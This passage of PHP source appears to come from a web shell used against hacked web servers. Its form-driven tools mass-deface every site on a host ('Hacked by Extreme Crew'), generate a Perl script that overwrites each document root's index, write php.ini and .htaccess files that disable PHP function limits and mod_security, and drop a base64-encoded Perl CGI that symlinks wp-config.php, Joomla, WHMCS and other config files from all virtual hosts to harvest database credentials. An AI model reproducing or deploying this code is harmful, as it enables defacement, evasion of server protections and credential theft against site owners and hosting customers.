612 }
613 } else {
614 echo "<center>";
615 echo "<form method='post'>
616 <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
617 <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
618 <font style='text-decoration: underline;'>Folder:</font><br>
619 <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
620 <font style='text-decoration: underline;'>Filename:</font><br>
621 <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
622 <font style='text-decoration: underline;'>Index File:</font><br>
623 <textarea name='script' style='width: 450px; height: 200px;'>Hacked by Extreme Crew</textarea><br>
624 <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
625 </form></center>";
626 }
627} elseif($_GET['do'] == 'mass_helper'){
628 echo "<center>";
629echo "<span style=\"color:lime; font: 14px Comic Sans MS; font-weight:bold;\">Help :<br>1. After u get root, Upload ur deface source as index.txt <br>2. Run this comand on ur CMD / Terminal : <br></span><br/>";
630echo "<help> <blink>=></blink><b> cat /etc/httpd/conf/httpd.conf | grep DocumentRoot>dir.txt </b></help><br/>";
631echo "<help> <blink>=></blink><b> cat /etc/httpd/conf/httpd.conf | grep ServerName>dmn.txt </b></help><br><br/><br/>";
632echo "<form method=POST>
633<help title='the file you want to put in all sites'> Def page name : </help>
634 <input title='the file name you want to put in all sites' type=text name=index value=bie.htm> |
635<help title='your deface page's source code'>Def source code :</help>
636 <input title='your index source code' type='text' name='source' value='index.txt'><br><br>
637<help>List DocumentRoot from httpd.conf : </help><br>
638<input type=text name=dirs size=\"40\">
639<br><br>
640<help>List ServerName from httpd.conf : </help><br>
641<input type=text name=sites size=\"40\">
642<br><br>
643<center><input class='but' type=submit value='Generate ' name='go'></center>
644</form>
645<br/>";
646echo "</center>";
647if($_POST['go']){
648echo "<b></b>";
649$index = $_POST['index'];
650$source = $_POST['source'];
651$dirs =explode("\n",@dd1(file_get_contents($_POST['dirs'])));
652$sites =explode("\n",@dd2(file_get_contents($_POST['sites'])));
653
654// preparing perl script
655
656if($_POST['dirs']){
657
658
659 $perl = fopen ('mass.txt','w+') or die (" WTF !! , i cannot create files o__O");
660 $perl_start = "#!/usr/bin/perl";
661 $perl_end = "print\"All Defaced !\";";
662 fwrite ($perl,$perl_start."\n\n"); // Write !!
663
664foreach($dirs as $dir){
665
666$result = "system(\"cat ".$source." > ".@kill($dir)."/".$index."\");";
667fwrite ($perl, $result."\n");
668flush();
669}
670 echo "<tr><td><font style='font: 9pt Comic Sans MS; COLOR: #FFFFFF;font-weight:bold;'>perl script <a style='text-decoration: none;color:lime;' href='mass.txt'>mass.txt</a></font></td><td><br>";
671 echo "<help>Now run this mass.txt on ur CMD / Terminal <blink>=> </blink> perl mass.txt </help><br>";
672 fwrite ($perl, "\n".$perl_end);
673 fclose($perl);
674
675 }
676 // preparing sites list
677
678if($_POST['sites']){
679
680
681 $sitess = fopen ('sites.txt','w+') or die ("WTF !! , i can't create files o__O");
682 $sitess_start = "http://";
683 $sitess_end = "/";
684 fwrite ($sitess,"");
685
686foreach($sites as $site){
687
688 $result2 = $sitess_start.@kill($site).$sitess_end.$index;
689 fwrite ($sitess, $result2."\n");
690 flush();
691}
692 echo "<br /><tr><td><help>Defaced sites : <a style='text-decoration: none;color:lime;' href='sites.txt'>sites.txt</a></help></td><td><br/><br/>";
693 fwrite ($sitess,"");
694 fclose($sitess);
695
696}
697 }
698function kill($value){ return str_replace(array("\n","\r"),"",$value); }
699function dd1($value){ return str_replace(array("DocumentRoot"," "),"",$value); }
700function dd2($value){ return str_replace(array("ServerName"," "),"",$value); }
701echo "<br />";
702echo "<div class='greetz'><center> Original script by <b>ReZK2LL</center><font></div>";
703
704} elseif($_GET['do'] == 'bypass'){
705 echo "<center>";
706 echo "<form method=post><input type=submit name=ini value='php.ini' /> <input type=submit name=htce value='.htaccess' /></form>";
707 if(isset($_POST['ini']))
708{
709 $file = fopen("php.ini","w");
710 echo fwrite($file,"disable_functions=none
711safe_mode = Off
712 ");
713 fclose($file);
714 echo "<a href='php.ini'>click here!</a>";
715} if(isset($_POST['htce']))
716{
717 $file = fopen(".htaccess","w");
718 echo fwrite($file,"<IfModule mod_security.c>
719SecFilterEngine Off
720SecFilterScanPOST Off
721</IfModule>
722 ");
723 fclose($file);
724 echo "htaccess successfully created!";
725}
726 echo"</center>";
727} elseif($_GET['do'] == 'convh')
728 {
729@mkdir('ecboss', 0755);
730@chdir('ecboss');
731 $elesem = ".htaccess";
732 $elakab = "$elesem";
733 $filhat = fopen ($elakab , 'w') or die ("Can't Write htaccess !");
734 $htcont = "Options FollowSymLinks MultiViews Indexes ExecCGI
735
736AddType application/x-httpd-cgi .ler
737
738AddHandler cgi-script .ler
739AddHandler cgi-script .ler";
740 fwrite ( $filhat , $htcont ) ;
741 fclose ($filhat);
742$config = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluCnByaW50ICJDb250ZW50LXR5cGU6IHRleHQvaHRtbFxuXG4iOwpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+CjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4KCjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJlbi11cyIgLz4KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+Cjx0aXRsZT52SG9zdHMgQ29uZmlnIEdyYWJiZXI8L3RpdGxlPgo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPgoubmV3U3R5bGUxIHsKIGZvbnQtZmFtaWx5OiB1YnVudHU7CiBmb250LXNpemU6IHgtbGFyZ2U7CiBjb2xvcjogd2hpdGU7CiBiYWNrZ3JvdW5kLWNvbG9yOiAjMTUxNTE1OwogdGV4dC1hbGlnbjogY2VudGVyOwp9Cjwvc3R5bGU+CjwvaGVhZD4KJzsKCgpwcmludCAnCjxib2R5IGNsYXNzPSJuZXdTdHlsZTEiPgo8cD4uOiBDb2RlZCBieSBGYWxsYWcgR2Fzc3JpbmkgfCBSZWMwZGVkIGJ5IENvdXJhZ2V1eDwvcD4nOwpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOwpmb3JlYWNoKHNvcnQgcmVhZGRpciAkZGlyKSB7CiAgICBteSAkaXNEaXIgPSAwOwogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsKJHNpdGVzcyA9ICRfOwoKCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlcy9jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLW9zLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZS9pbmNsdWRlcy9jb25maWd1cmUucGhwJywkc2l0ZXNzLictb3Njb21tZXJjZS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2VzL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1vc2NvbW1lcmNlcy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2hvcHBpbmcvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atc2hvcHBpbmcudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zYWxlLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIyLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWVtYmVycy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLW1lbWJlcnMudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW0udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bXMvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtcy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmZpZy5waHAnLCRzaXRlc3MuJy00LnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AxMy13cC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dQL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLVdQLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd3AvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AxMy13cC1iZXRhLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AxMy1iZXRhLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJlc3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtcHJlc3MudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtd29yZHByZXNzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV29yZHByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLVdvcmRwcmVzcy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtV29yZHByZXNzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd29yZHByZXNzL2JldGEvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtd29yZHByZXNzLWJldGEudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXdzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLW5ld3MudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtbmV3LnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmxvZy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AtYmxvZy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JldGEvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwLWJldGEudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AtYmxvZ3MudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob21lL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cC1ob21lLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cC1wcm90YWwudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cC1zaXRlLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AtbWFpbi50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Rlc3Qvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwLXRlc3QudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb29tbGEvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEyLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvby9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvby50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Ntcy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1jbXMudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLW1haW4udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXdzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLW5ld3MudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9tZS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1ob21lLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLXZifmNvbmZpZy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy12YjF+Y29uZmlnLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWluY2x1ZGVzLXZiLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY2xhc3NfY29yZS5waHAnLCRzaXRlc3MuJy12Ymx1dHRpbn5jbGFzc19jb3JlLnBocC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2MvaW5jbHVkZXMvY2xhc3NfY29yZS5waHAnLCRzaXRlc3MuJy12Ymx1dHRpbn5jbGFzc19jb3JlLnBocDIudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0xNS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS93aG1jcy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS13aG1jcy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9XSE1DUy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1XSE1DUy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG1jcy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobWNzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnQudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NlY3VyZS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NlY3VyZS93aG0vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUtd2htLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY3BhbmVsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY3BhbmVsLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1wYW5lbC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWhvc3RpbmcudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWhvc3RzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdWJtaXR0aWNrZXQucGhwJywkc2l0ZXNzLictd2htY3MyLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNsaWVudHMudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlcy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNsaWVudGVzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNsaWVudC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWJpbGxpbmcudHh0Jyk7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFuYWdlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW1hbmFnZS50eHQnKTsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teXNob3AvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbXlzaG9wLnR4dCcpOyAKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2Rpc3QtY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXplbmNhcnQudHh0Jyk7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2hvcC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLVpDc2hvcC50eHQnKTsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9TZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1zbWYudHh0Jyk7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vU2V0dGluZ3MucGhwJywkc2l0ZXNzLictc21mLWZvcnVtLnR4dCcpOyAKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9TZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1zbWYtZm9ydW1zLnR4dCcpOyAKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcnRpY2xlL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1Od2FoeS50eHQnKTsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy91cC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAyLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGUvZGIucGhwJywkc2l0ZXNzLictNy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Nvbm5lY3QucGhwJywkc2l0ZXNzLictUEhQLUZ1c2lvbi50eHQnKTsKc3ltbG